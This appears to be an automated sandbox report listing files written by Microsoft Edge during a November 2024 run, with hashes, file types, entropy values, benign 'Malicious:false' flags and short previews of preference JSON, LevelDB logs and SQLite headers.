                                                                                                                                                                                                                                                        MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                        SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                        SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                        SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (17456), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17457
                                                                                                                                                                                                                                                        Entropy (8bit):5.485880197194505
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:st1PGQSu46s0NfhYWY2xWx+TBbGxQwT6W0laTYS:s7OXu5NfpYUdbGioaaTYS
                                                                                                                                                                                                                                                        MD5:F2B84F3DDEE8DEAEC08242216B3A0CFB
                                                                                                                                                                                                                                                        SHA1:ED4E13C16E499C2BA2E83158FBED5AF796DA6722
                                                                                                                                                                                                                                                        SHA-256:5613B2EA8D957A04117898C87C915E5F1C20C43FBBCD57DBED3B6DA75A8A6E53
                                                                                                                                                                                                                                                        SHA-512:991969F5CFC109D6C45A1BE776CFD118FBB67303BC71196CB8960B4539AF8833A8ABF971E12D40207F036B28F47A75F995C6EFC1F28A7F89142B6AE5E76F0E08
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (17456), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17457
                                                                                                                                                                                                                                                        Entropy (8bit):5.486000272758747
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:st1PGQSu46s0NfhYWY2xWx+TBbGxQwT6WolaTYS:s7OXu5NfpYUdbGioeaTYS
                                                                                                                                                                                                                                                        MD5:0C994D1753D1ADB2817C72A227D52143
                                                                                                                                                                                                                                                        SHA1:A6E7F4E93D604C16100D79135AACA1723692C922
                                                                                                                                                                                                                                                        SHA-256:F4344D26235DF50D5E3AED8907F3662CEE410DF477C9ED6FA1DAB7F98DC6ED62
                                                                                                                                                                                                                                                        SHA-512:B0E2499BBC353F75DED86B58B160984DC3120A5835B98276B564D55DE5B9D4B3ADB99F84877935B7BE6594D6CFE0D641CAF9F2BCD0E148FF94AC111AC56DEC42
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376620167792921","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):38627
                                                                                                                                                                                                                                                        Entropy (8bit):5.554626400109059
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:E5d8rf7pLGLPJDWPmwff18F1+UoAYDCx9Tuqh0VfUC9xbog/OVqgeF1rwBfuejqr:E5d8rZcPJDWPmwff1u1jajJF+Bfuemm0
                                                                                                                                                                                                                                                        MD5:9C51F378E8F919D95D267ECB095D5FB1
                                                                                                                                                                                                                                                        SHA1:C48E3DA21492013ADAC3AC93C9E8964405AC8CF9
                                                                                                                                                                                                                                                        SHA-256:0E806FC066BD105040858CE8F0DBE6DE70D26FD92B1B3A421D5D107A1D2A10D6
                                                                                                                                                                                                                                                        SHA-512:C11CD01B7E27A05B5459E6CC2BB3BAFFEA79590FBE3BDDC2C54AD475F584D97D4B8B174DD1BA3400BBFD31D8692EB7E70E753E51D5C89B4663FAFB66555B3A22
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376620167251414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376620167251414","location":5,"ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):309
                                                                                                                                                                                                                                                        Entropy (8bit):5.225834657116704
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHVucGR1923oH+Tcwtp3hBtB2KLlVHe2O+q2P923oH+Tcwtp3hBWsIFUv:nMMYebp3dFL/XO+v4Yebp3eFUv
                                                                                                                                                                                                                                                        MD5:776825E1891AD4E941DBF0248B000E46
                                                                                                                                                                                                                                                        SHA1:C47F4AC36ADC16CACF0B9AD5B23A692E9EC185C7
                                                                                                                                                                                                                                                        SHA-256:CAE8B3452D3283C7EBE024C30F12F5F332A1CE21CDD6B203E16268863E4E8AB1
                                                                                                                                                                                                                                                        SHA-512:17D5CBE82B2BA6B24D460B3E03B193479BAA5D0F31DC890D8BC5BA04AA39BF6595706B441853E2D4A8DB6781BB9753B3E37154B96DB95781E2B8A2EA3FA873C2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:32.042 1fec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/20-18:49:32.077 1fec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                        Entropy (8bit):5.222872177366708
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:v+/PN8FzfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8hfx2mjF
                                                                                                                                                                                                                                                        MD5:2282E3CABF3A977AE9FBB3B9815EA9F1
                                                                                                                                                                                                                                                        SHA1:42672EDF8F1B9645C35A6B68153F8654D5ACE7EC
                                                                                                                                                                                                                                                        SHA-256:3EA220B1A58587A6A1A598920772749F0C71BB4555376D9D59B988D8AB73451D
                                                                                                                                                                                                                                                        SHA-512:413850C3829FFBB77236C96BE39B0E259DE149165736083757D099EA3F86EC9C5B7AF20C6A41F6DABC4D1B19963E29385524FBC3730EDAFA017FA36A82B0A870
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                        Entropy (8bit):5.134136531436597
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcnijL+q2P923oH+Tcwt9Eh1tIFUt8YHcmGFzKWZmw+YHchLVkwO923oH+TcwtY:nkKL+v4Yeb9Eh16FUt8kvGAW/+keLV5s
                                                                                                                                                                                                                                                        MD5:B9BFC3D8F3B8D6B316A56B56BF6FB2B9
                                                                                                                                                                                                                                                        SHA1:20CC7BACA36DB475E446164A0B0AE11F25D3F06C
                                                                                                                                                                                                                                                        SHA-256:A24AF430E376D8A30CCCC9FEA1DD17414A800A0BBFC56C5F0DE9D30C5046D6F2
                                                                                                                                                                                                                                                        SHA-512:30D1C688F97B19369055245219B1E08EBCC8EB45240DA91D259607C54199538DCA647D3A872F790704A2DD73905EB1B8AC37925202EA5ED27D0255AEF8CA155C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:31.939 205c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/20-18:49:31.941 205c Recovering log #3.2024/11/20-18:49:31.949 205c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                        Entropy (8bit):5.134136531436597
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcnijL+q2P923oH+Tcwt9Eh1tIFUt8YHcmGFzKWZmw+YHchLVkwO923oH+TcwtY:nkKL+v4Yeb9Eh16FUt8kvGAW/+keLV5s
                                                                                                                                                                                                                                                        MD5:B9BFC3D8F3B8D6B316A56B56BF6FB2B9
                                                                                                                                                                                                                                                        SHA1:20CC7BACA36DB475E446164A0B0AE11F25D3F06C
                                                                                                                                                                                                                                                        SHA-256:A24AF430E376D8A30CCCC9FEA1DD17414A800A0BBFC56C5F0DE9D30C5046D6F2
                                                                                                                                                                                                                                                        SHA-512:30D1C688F97B19369055245219B1E08EBCC8EB45240DA91D259607C54199538DCA647D3A872F790704A2DD73905EB1B8AC37925202EA5ED27D0255AEF8CA155C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:31.939 205c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/20-18:49:31.941 205c Recovering log #3.2024/11/20-18:49:31.949 205c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                        Entropy (8bit):0.4630898690351767
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuG6:TouQq3qh7z3bY2LNW9WMcUvBuG6
                                                                                                                                                                                                                                                        MD5:B1CF37320A22C28773DDB8CDE81648BF
                                                                                                                                                                                                                                                        SHA1:F4E80839A076C91E713BACCDF429513E69EB8164
                                                                                                                                                                                                                                                        SHA-256:247F0A59EA3522118EAEACB0FF6EABF11226EEDC5CDE06060A16B7399BC0C100
                                                                                                                                                                                                                                                        SHA-512:76FC2C49C72F121B4456C59419D7AFE531A9BAF17264DD1757FD85AD07195283754D837684959F05FC58C62F5B59153B3F684416B1D907619BBDE33332EC6FB4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                        Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):345
                                                                                                                                                                                                                                                        Entropy (8bit):5.1988246323206395
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHxctq2P923oH+TcwtnG2tMsIFUt8YHxcIZmw+YHxcQkwO923oH+TcwtnG2tMsLJ:nxAv4Yebn9GFUt8kxh/+kx75LYebn95J
                                                                                                                                                                                                                                                        MD5:7734BF878980AEF9F304E54B64BC67BF
                                                                                                                                                                                                                                                        SHA1:9898421105947715528FE7CF5D2957C17EE53F43
                                                                                                                                                                                                                                                        SHA-256:1A1E93E44C79215DAC86BD604D5ED1AD1200D3498B293A55BB33149ACB50BB47
                                                                                                                                                                                                                                                        SHA-512:DAC78C4A7CC1D04D465040D4564265EF8F6D7505F64CFACD25E447147112C1F730D4FE9934AB54B0E98A0D3BDED2FE0661D0A5728ECE59BE2FB0FA7321121602
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.331 d70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/20-18:49:27.331 d70 Recovering log #3.2024/11/20-18:49:27.331 d70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):345
                                                                                                                                                                                                                                                        Entropy (8bit):5.1988246323206395
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHxctq2P923oH+TcwtnG2tMsIFUt8YHxcIZmw+YHxcQkwO923oH+TcwtnG2tMsLJ:nxAv4Yebn9GFUt8kxh/+kx75LYebn95J
                                                                                                                                                                                                                                                        MD5:7734BF878980AEF9F304E54B64BC67BF
                                                                                                                                                                                                                                                        SHA1:9898421105947715528FE7CF5D2957C17EE53F43
                                                                                                                                                                                                                                                        SHA-256:1A1E93E44C79215DAC86BD604D5ED1AD1200D3498B293A55BB33149ACB50BB47
                                                                                                                                                                                                                                                        SHA-512:DAC78C4A7CC1D04D465040D4564265EF8F6D7505F64CFACD25E447147112C1F730D4FE9934AB54B0E98A0D3BDED2FE0661D0A5728ECE59BE2FB0FA7321121602
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.331 d70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/20-18:49:27.331 d70 Recovering log #3.2024/11/20-18:49:27.331 d70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                        Entropy (8bit):0.6126865540007952
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jNNip/4mL:TO8D4jJ/6Up+j2
                                                                                                                                                                                                                                                        MD5:9B10A8CF463E43363739A21B12413B5E
                                                                                                                                                                                                                                                        SHA1:79939654A1D40E1A7B6AFD6A2AF8A2D7FAAA121D
                                                                                                                                                                                                                                                        SHA-256:CFCE8C056C25CBECFB71E2A1517A0B85ED577ADD548D13ED30C07D1D6A9D4DBE
                                                                                                                                                                                                                                                        SHA-512:B0C0FD979F8D30E876BEEC1205A616A09D7E853B4A9751F2BC013F9BF410E9456275FF70CC1AEBF9534ECED931C8E02EB40E03040F6CD9D3F7DB3529A34399DC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                        Entropy (8bit):5.35409521335073
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:bA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:bFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                        MD5:009D6C8D183DBD5BE5E770FA41A61E55
                                                                                                                                                                                                                                                        SHA1:01583F07998134CE8DA81678021FED3508490F22
                                                                                                                                                                                                                                                        SHA-256:5D495E88932AC72508EFB0FB0DE756198E9D843911DEC8DACC71A40BB9232380
                                                                                                                                                                                                                                                        SHA-512:E094AC3DE0140C4A1E9580B427A00D92400C4CEA08F9FF598E59E726F572BBDD0F0B9228E060F4CF95C1E517D18DB264C8E015379884C52109F45E1300079866
                                                                                                                                                                                                                                                        Malicious:false
